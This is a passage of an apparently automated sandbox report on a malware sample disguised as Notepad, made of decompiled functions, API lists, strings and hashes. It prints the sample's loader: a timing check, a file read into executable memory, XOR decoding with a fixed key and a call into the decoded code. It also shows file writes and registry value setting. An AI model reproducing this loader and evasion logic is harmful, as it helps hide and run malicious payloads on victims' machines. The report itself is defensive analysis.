				_t54 = _v8();
				Sleep(0x2be);
				_t55 = _v8();
				_t131 = _t55 - _t54 - 0x2bc;
				if(_t55 - _t54 < 0x2bc) {
					L4:
					 *0x4151c0 = RegisterWindowMessageW(L"commdlg_FindReplace");
					E004031B0(0x415f60, 0, 0x11f4);
					 *0x415f60 = _a4;
					E004014EC(_t113, _t135);
					_t117 = 0x30;
					E004031B0( &_v132, 0, _t117);
					_t63 =  *0x415f60; // 0x0
					_v132.cbSize = _t117;
					_v132.lpfnWndProc = E0040232A;
					_v132.hInstance = _t63;
					_v132.hIcon = LoadIconW(_t63, 0x300);
					_t65 = GetSystemMetrics(0x32);
					_v132.hIconSm = LoadImageW( *0x415f60, 0x300, 1, GetSystemMetrics(0x31), _t65, 0x8000);
					_v132.hCursor = LoadCursorW(0, 0x7f00);
					_v132.hbrBackground = 6;
					_v132.lpszMenuName = 0x201;
					_v132.lpszClassName = L"Notepad";
					_t70 = RegisterClassExW( &_v132);
					if(_t70 == 0) {
						return 0;
					}
					__imp__MonitorFromRect(0x4151c4, 1);
					_v84.cbSize = 0x28;
					GetMonitorInfoW(_t70,  &_v84);
					_t72 =  *0x4151c4; // 0x0
					_t119 =  *0x4151c8; // 0x0
					_t110 =  *0x4151d0; // 0x0
					_t114 =  *0x4151cc; // 0x0
					_t106 = _t72;
					_a12 = _t119;
					__eflags = _t72 - _v56;
					if(_t72 >= _v56) {
						L10:
						_a12 = 0x80000000;
						_t106 = 0x80000000;
						L11:
						_t73 = CreateWindowExW(0, L"Notepad", L"Notepad", 0xcf0000, _t106, _a12, _t114 - _t72, _t110 - _t119, 0, 0,  *0x415f60, 0);
						 *0x415f64 = _t73;
						__eflags = _t73;
						if(_t73 != 0) {
							E00401ABC();
							0x400000();
							ShowWindow( *0x415f64, _a16);
							UpdateWindow( *0x415f64);
							DragAcceptFiles( *0x415f64, 1);
							E00401F93(GetCommandLineW());
							_t107 = LoadAcceleratorsW(_a4, 0x203);
							while(1) {
								_t81 = GetMessageW( &_v44, 0, 0, 0);
								__eflags = _t81;
								if(_t81 == 0) {
									break;
								}
								_t83 = IsDialogMessageW( *0x415f68,  &_v44);
								__eflags = _t83;
								if(_t83 == 0) {
									_t85 = TranslateAcceleratorW( *0x415f64, _t107,  &_v44);
									__eflags = _t85;
									if(_t85 == 0) {
										TranslateMessage( &_v44);
										DispatchMessageW( &_v44);
									}
								}
							}
							return _v44.wParam;
						}
						0x400000();
						ExitProcess(1);
					}
					__eflags = _t119 - _v52;
					if(_t119 >= _v52) {
						goto L10;
					}
					__eflags = _t114 - _v84.rcWork;
					if(_t114 < _v84.rcWork) {
						goto L10;
					}
					__eflags = _t110 - _v60;
					if(_t110 >= _v60) {
						goto L11;
					}
					goto L10;
				}
				_t92 = E0040318F(_a12, L"rb"); // executed
				_push(2);
				_t121 = _t92;
				_push(0);
				_push(_t121); // executed
				E00403055(_t104, _t121, 0, _t131); // executed
				_push(_t121); // executed
				_t94 = E00402F66(_t104, _t121, 0, _t131); // executed
				_push(0);
				_push(0);
				_push(_t121);
				_t108 = _t94; // executed
				E00403055(_t108, _t121, 0, _t131); // executed
				_a12 = VirtualAlloc(0, _t108, 0x3000, 0x40);
				E00402DB5(_t96, _t108, 1, _t121); // executed
				_t127 = _t127 + 0x34;
				_t112 = 0;
				if(_t108 <= 0) {
					L3:
					_a12();
					goto L4;
				} else {
					goto L2;
				}
				do {
					L2:
					_v16 = _a12 + _t112;
					asm("cdq");
					_t122 = 0xc;
					_t113 = _t112 % _t122;
					 *_v16 =  *_v16 ^  *("248058040134" + _t112 % _t122);
					_t112 = _t112 + 1;
				} while (_t112 < _t108);
				goto L3;
			}

0x00402571
0x00402588
0x0040259f
0x004025ad
0x004025b5
0x004025b8
0x004025c2
0x004025c5
0x004025cc
0x004025d1
0x00402643
0x00402659
0x0040265f
0x0040266a
0x0040266f
0x00402676
0x0040267d
0x00402682
0x00402691
0x00402694
0x0040269b
0x004026b1
0x004026b4
0x004026d1
0x004026da
0x004026e1
0x004026e8
0x004026ef
0x004026f6
0x004026ff
0x00000000
0x00402701
0x0040270f
0x0040271a
0x00402721
0x00402727
0x0040272c
0x00402732
0x00402738
0x0040273e
0x00402740
0x00402743
0x00402746
0x00402757
0x00402757
0x0040275e
0x00402763
0x00402786
0x0040278c
0x00402791
0x00402793
0x004027a2
0x004027a7
0x004027b5
0x004027c1
0x004027cf
0x004027db
0x004027f4
0x00402835
0x0040283c
0x0040283e
0x00402840
0x00000000
0x00000000
0x00402802
0x00402808
0x0040280a
0x00402817
0x0040281d
0x0040281f
0x00402825
0x0040282f
0x0040282f
0x0040281f
0x0040280a
0x00000000
0x00402842
0x00402795
0x0040279c
0x0040279c
0x00402748
0x0040274b
0x00000000
0x00000000
0x0040274d
0x00402750
0x00000000
0x00000000
0x00402752
0x00402755
0x00000000
0x00000000
0x00000000
0x00402755
0x004025db
0x004025e0
0x004025e2
0x004025e4
0x004025e5
0x004025e6
0x004025eb
0x004025ec
0x004025f1
0x004025f2
0x004025f3
0x004025f4
0x004025f6
0x0040260f
0x00402612
0x00402617
0x0040261a
0x0040261e
0x00402640
0x00402640
0x00000000
0x00000000
0x00000000
0x00000000
0x00402620
0x00402620
0x00402625
0x0040262a
0x0040262d
0x0040262e
0x00402639
0x0040263b
0x0040263c
0x00000000

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll,GetTickCount), ref: 0040258E
GetProcAddress.KERNEL32(00000000), ref: 00402597
GetModuleHandleW.KERNEL32(Kernel32.dll,Sleep), ref: 004025A2
GetProcAddress.KERNEL32(00000000), ref: 004025A5
GetModuleHandleW.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 004025B0
GetProcAddress.KERNEL32(00000000), ref: 004025B3
Sleep.KERNELBASE(000002BE), ref: 004025C2
_fseek.LIBCMT ref: 004025E6
_fseek.LIBCMT ref: 004025F6

Part of subcall function 00403055: __lock_file.LIBCMT ref: 00403096
Part of subcall function 00403055: __fseek_nolock.LIBCMT ref: 004030A7

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00402607
__fread_nolock.LIBCMT ref: 00402612
RegisterWindowMessageW.USER32(commdlg_FindReplace), ref: 00402648
_memset.LIBCMT ref: 0040265F
_memset.LIBCMT ref: 0040267D
LoadIconW.USER32(00000000,00000300), ref: 0040269E
GetSystemMetrics.USER32 ref: 004026B4
GetSystemMetrics.USER32 ref: 004026B9
LoadImageW.USER32 ref: 004026C5
LoadCursorW.USER32(00000000,00007F00), ref: 004026D4
RegisterClassExW.USER32 ref: 004026F6

Part of subcall function 0040318F: __wfsopen.LIBCMT ref: 0040319C

MonitorFromRect.USER32(004151C4,00000001), ref: 0040270F
GetMonitorInfoW.USER32 ref: 00402721
CreateWindowExW.USER32 ref: 00402786
ExitProcess.KERNEL32 ref: 0040279C
ShowWindow.USER32(?), ref: 004027B5
UpdateWindow.USER32 ref: 004027C1
DragAcceptFiles.SHELL32(00000001), ref: 004027CF
GetCommandLineW.KERNEL32 ref: 004027D5
LoadAcceleratorsW.USER32 ref: 004027E8
IsDialogMessageW.USER32(?), ref: 00402802
TranslateAcceleratorW.USER32(00000000,?), ref: 00402817
TranslateMessage.USER32(?), ref: 00402825
DispatchMessageW.USER32 ref: 0040282F
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040283C

Strings

commdlg_FindReplace, xrefs: 00402643
Notepad, xrefs: 004026EF, 00402780
Notepad, xrefs: 0040277B
VirtualAlloc, xrefs: 004025A7
Kernel32.dll, xrefs: 00402588, 0040258D, 0040259E, 004025AC
(, xrefs: 0040271A
GetTickCount, xrefs: 00402583
Sleep, xrefs: 00402599

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: Message$LoadWindow$AddressHandleModuleProc$MetricsMonitorRegisterSystemTranslate_fseek_memset$AcceleratorAcceleratorsAcceptAllocClassCommandCreateCursorDialogDispatchDragExitFilesFromIconImageInfoLineProcessRectShowSleepUpdateVirtual__fread_nolock__fseek_nolock__lock_file__wfsopen
String ID: ($GetTickCount$Kernel32.dll$Notepad$Notepad$Sleep$VirtualAlloc$commdlg_FindReplace
API String ID: 1051210470-2062807747
Opcode ID: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
Instruction ID: 86ed525f5f6418c5d4d27ac436486db8ae60d9136c2ac2c32b89dc552047780a
Opcode Fuzzy Hash: c0167c71671bf53e787d6d9d4aae9a93767b5de61ac2528c01b7e0414419f5a9
Instruction Fuzzy Hash: AE816D71940208BBDB10AFA5DD4DFDE7FB8EB48704F10443AF500A61A1D7B99981CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00480F9C Relevance: 6.5, APIs: 4, Instructions: 538
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 1c7147bf34f78ff358abaab479f68c2818ad3ac4607ad9030e88490da089793e
Instruction ID: 9fdb7909f3c42d39227716b2dbb7463b9eb50c12ad80e59a47b806a10a7aca6e
Opcode Fuzzy Hash: 1c7147bf34f78ff358abaab479f68c2818ad3ac4607ad9030e88490da089793e
Instruction Fuzzy Hash: EF32D620D5D3D8ADDF12CBE994117FCBFB09F1A201F1844CAE494F6292D23A478ADB25

Uniqueness

Uniqueness Score: -1.00%

Function 00480EBF Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?), ref: 00480EDC

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
Instruction ID: 1e168db6e0878d3e90c47af3bcfa01028a29ef0934e4e8a357b2954e68a76c07
Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
Instruction Fuzzy Hash: B7F0A771D2410CABDB98F6B89846AAE77ACDB09200F10896EE706D2240D578C5444769

Uniqueness

Uniqueness Score: -1.00%

Function 0048163C Relevance: 10.7, APIs: 7, Instructions: 194
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30), ref: 00481702
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040), ref: 0048172C
ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000), ref: 00481743
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040), ref: 00481765
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?,00000000,0000000E), ref: 004817D7
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?), ref: 004817E2
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00481ED2,7FAB7E30,00481B90,00000000,00000040,?), ref: 0048182D

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7c0ab75c56e8c76ece55b700bc8b5fe8c2a98b772918e02627d31dd295609cbd
Instruction ID: 2007e5f95bc7f95503861dd7072f361862d74fbb52945922b8adc8d860a117db
Opcode Fuzzy Hash: 7c0ab75c56e8c76ece55b700bc8b5fe8c2a98b772918e02627d31dd295609cbd
Instruction Fuzzy Hash: C7519171E10318ABDB10AFF5DC85BAEB7B8AF05714F10891BF911F7290D77899018B68

Uniqueness

Uniqueness Score: -1.00%

Function 0048020A Relevance: 10.6, APIs: 7, Instructions: 147
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.KERNELBASE(?), ref: 004802E1
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00480324
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00480336
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0048033E
CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 00480354
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00480363

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
String ID:
API String ID: 2600930906-0
Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
Instruction ID: 0e011e1f2ff4ac72c8a7dd6c2a127a897981ff4c6e5640dd9c991066836c4e91
Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
Instruction Fuzzy Hash: FE418D75A10208BAEB10AFF1EC56FAFB678EF45750F10491BF910F6290E7798A048769

Uniqueness

Uniqueness Score: -1.00%

Function 004808EF Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 00480929

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: e3089470e43f2722dd2c6064ea87a7aa536657f659faca682a86d07b654df7ff
Instruction ID: a2e6684b66b0a03513722700e4f0ef80260ec68d79df42484568c54d85124995
Opcode Fuzzy Hash: e3089470e43f2722dd2c6064ea87a7aa536657f659faca682a86d07b654df7ff
Instruction Fuzzy Hash: 97021570E10208EFDB54EF94CD85BADBBB5BF04304F20445AE515BA2A1D778AE89DF18

Uniqueness

Uniqueness Score: -1.00%

Function 00402B6B Relevance: 7.7, APIs: 5, Instructions: 160
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00402B6B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t120;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t127;

				_t110 = _a4;
				_t108 = _a8;
				_t123 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t123 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t131 = _t110;
					if(_t110 != 0) {
						_t126 = _a20;
						__eflags = _t126;
						if(_t126 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E004031B0(_t110, 0, _t108);
								_t127 = _t127 + 0xc;
							}
							__eflags = _t126;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t124 = _t123 * _a16;
								__eflags =  *(_t126 + 0xc) & 0x0000010c;
								_v20 = _t124;
								_t109 = _t124;
								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t126 + 0x18));
								}
								__eflags = _t124;
								if(_t124 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t126 + 0xc) & 0x0000010c;
										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E00404F6E(_t109, _t124, _t126); // executed
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t124 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E004031B0(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E0040370A(__eflags))) = 0x22;
													L4:
													E004036B8();
													goto L5;
												}
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t126 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t120 = _t50;
													_t101 = _t109;
												} else {
													_t120 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t120;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_push(E0040573D(_t126)); // executed
												_t98 = E00405647(_t109, _t124, _t126, __eflags); // executed
												_t127 = _t127 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t126 + 0xc;
													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t126 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t125 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t125 = _t104;
										}
										__eflags = _t125 - _v8;
										if(_t125 > _v8) {
											goto L41;
										} else {
											E00405763(_v12, _v8,  *_t126, _t125);
											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
											 *_t126 =  *_t126 + _t125;
											_v12 = _v12 + _t125;
											_t109 = _t109 - _t125;
											_t127 = _t127 + 0x10;
											_v8 = _v8 - _t125;
											_t124 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t123;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E0040370A(_t131))) = 0x16;
					goto L4;
				}
			}

0x00402b73
0x00402b77
0x00402b7c
0x00402b7f
0x00402b82
0x00402b87
0x00402ba3
0x00000000
0x00402b8f
0x00402b8f
0x00402b91
0x00402baa
0x00402bad
0x00402baf
0x00402bbd
0x00402bbd
0x00402bc0
0x00402bc6
0x00402bcb
0x00402bcb
0x00402bce
0x00402bd0
0x00000000
0x00402bd2
0x00402bd9
0x00402bdc
0x00000000
0x00000000
0x00402bde
0x00402bde
0x00402be2
0x00402be9
0x00402bec
0x00402bee
0x00402bf8
0x00402bf0
0x00402bf3
0x00402bf3
0x00402bff
0x00402c01
0x00402ce1
0x00000000
0x00402c07
0x00402c07
0x00402c07
0x00402c0e
0x00402c54
0x00402c54
0x00402c57
0x00402cb6
0x00402cbc
0x00402cbf
0x00402d13
0x00000000
0x00402d19
0x00402cc1
0x00402cc5
0x00402ce9
0x00402ce9
0x00402ced
0x00402cf7
0x00402cfc
0x00402d04
0x00402b9e
0x00402b9e
0x00000000
0x00402b9e
0x00402cca
0x00402ccd
0x00402cd2
0x00402cd3
0x00402cd3
0x00402cd3
0x00402cd6
0x00000000
0x00402cd6
0x00402c59
0x00402c5d
0x00402c7e
0x00402c83
0x00402c85
0x00402c87
0x00402c87
0x00402c5f
0x00402c66
0x00402c68
0x00402c75
0x00402c75
0x00402c75
0x00402c78
0x00402c6a
0x00402c6c
0x00402c6f
0x00402c6f
0x00402c7a
0x00402c7a
0x00402c89
0x00402c8c
0x00000000
0x00402c8e
0x00402c8e
0x00402c8f
0x00402c99
0x00402c9a
0x00402c9f
0x00402ca2
0x00402ca4
0x00402d21
0x00000000
0x00402d21
0x00402ca6
0x00402ca9
0x00402d0f
0x00402d0f
0x00402d0f
0x00402d0f
0x00000000
0x00402d0f
0x00402cab
0x00402cae
0x00402cb0
0x00000000
0x00402cb0
0x00402c8c
0x00402c10
0x00402c13
0x00402c15
0x00000000
0x00000000
0x00402c17
0x00000000
0x00000000
0x00402c1d
0x00402c1f
0x00402c21
0x00402c23
0x00402c23
0x00402c25
0x00402c28
0x00000000
0x00402c2e
0x00402c37
0x00402c3c
0x00402c3f
0x00402c41
0x00402c44
0x00402c46
0x00402c49
0x00402c4c
0x00402c4c
0x00402cd9
0x00402cd9
0x00402cd9
0x00000000
0x00402c07
0x00402c01
0x00402bd0
0x00402bb6
0x00402bb8
0x00402bbb
0x00000000
0x00000000
0x00000000
0x00402bbb
0x00402b93
0x00402b98
0x00000000
0x00402b98

APIs

_memset.LIBCMT ref: 00402BC6
_memcpy_s.LIBCMT ref: 00402C37
__read.LIBCMT ref: 00402C9A
__filbuf.LIBCMT ref: 00402CB6

Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A

_memset.LIBCMT ref: 00402CF7

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
Instruction ID: abacd86320d5ed1a29450df115b8c4d9fa12e2f409c427afaea6b8449eeccf7a
Opcode Fuzzy Hash: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
Instruction Fuzzy Hash: AB51F930A00205EBDB249F698A4865FB7B1EF40320F24827BE821772D0D7B9DE41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00407055 Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407055() {
				WCHAR* _t2;
				void* _t4;
				void* _t15;
				WCHAR* _t17;

				_t2 = GetEnvironmentStringsW();
				_t17 = _t2;
				if(_t17 != 0) {
					if( *_t17 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t2 =  &(_t2[1]);
							} while ( *_t2 != 0);
							_t2 =  &(_t2[1]);
						} while ( *_t2 != 0);
					}
					_t1 = _t2 - _t17 + 2; // -2
					_t10 = _t1;
					_t4 = E00408BFA(_t1); // executed
					_t15 = _t4;
					if(_t15 != 0) {
						E00409DE0(_t15, _t17, _t10);
					}
					FreeEnvironmentStringsW(_t17);
					return _t15;
				} else {
					return 0;
				}
			}

0x00407058
0x0040705e
0x00407064
0x0040706d
0x00000000
0x0040706f
0x0040706f
0x0040706f
0x0040706f
0x00407072
0x00407077
0x0040707a
0x0040706f
0x00407082
0x00407082
0x00407087
0x0040708c
0x00407091
0x004070a3
0x004070a8
0x00407094
0x0040709f
0x00407066
0x00407069
0x00407069

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00403312), ref: 00407058
__malloc_crt.LIBCMT ref: 00407087
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00407094

Memory Dump Source

Source File: 00000002.00000002.270317273.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.270301425.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270350448.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.270407443.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_fdqkbs.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
Instruction ID: a157651967c13172b9dd03f83ae22e2c4aa92d1ff81e8b70bdfe45de40c08460
Opcode Fuzzy Hash: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
Instruction Fuzzy Hash: BFF02E77D080116ACB317735BC5589B2728CAD5364306813BF406F3382F938AD81C2AA

Uniqueness

Uniqueness Score: -1.00%

Function 00480422 Relevance: 4.9, APIs: 3, Instructions: 391
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048037C: PathFileExistsW.KERNELBASE(?), ref: 00480406
Part of subcall function 0048037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412

Part of subcall function 0048020A: PathFileExistsW.KERNELBASE(?), ref: 004802E1
Part of subcall function 0048020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 004802FF

RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 00480875
RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 00480891
RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 004808CF

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: File$CreateExistsPathValue$DirectoryOpen
String ID:
API String ID: 3065547873-0
Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
Instruction ID: 498ffd471fdff6c3de7371ec1af5bb4f55fd9987042214dd8db9f43c787b6c7f
Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
Instruction Fuzzy Hash: E1D14F21E64358A9EB20DBF0DC41FEEB778EF14750F10549BE608EB190E7B54A84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0048037C Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.KERNELBASE(?), ref: 00480406
CreateDirectoryW.KERNELBASE(?,00000000), ref: 00480412

Memory Dump Source

Source File: 00000002.00000002.270493693.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_480000_fdqkbs.jbxd

Similarity

API ID: CreateDirectoryExistsFilePath
String ID:
API String ID: 2624722123-0
Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
Instruction ID: f7226abc605649c109aacaafde02357ce878df971b12a456388b0a4ab7084ea5
Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
Instruction Fuzzy Hash: 0611E725A64308B4EB10ABF0EC12FBE6335DF40B10F10991BF904EB2A0E6764A448399

Uniqueness

Uniqueness Score: -1.00%

Function 00402D27 Relevance: 3.0, APIs: 2, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E00402D27(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				intOrPtr _t22;
				void* _t33;

				_push(0xc);
				_push(0x411fd0);
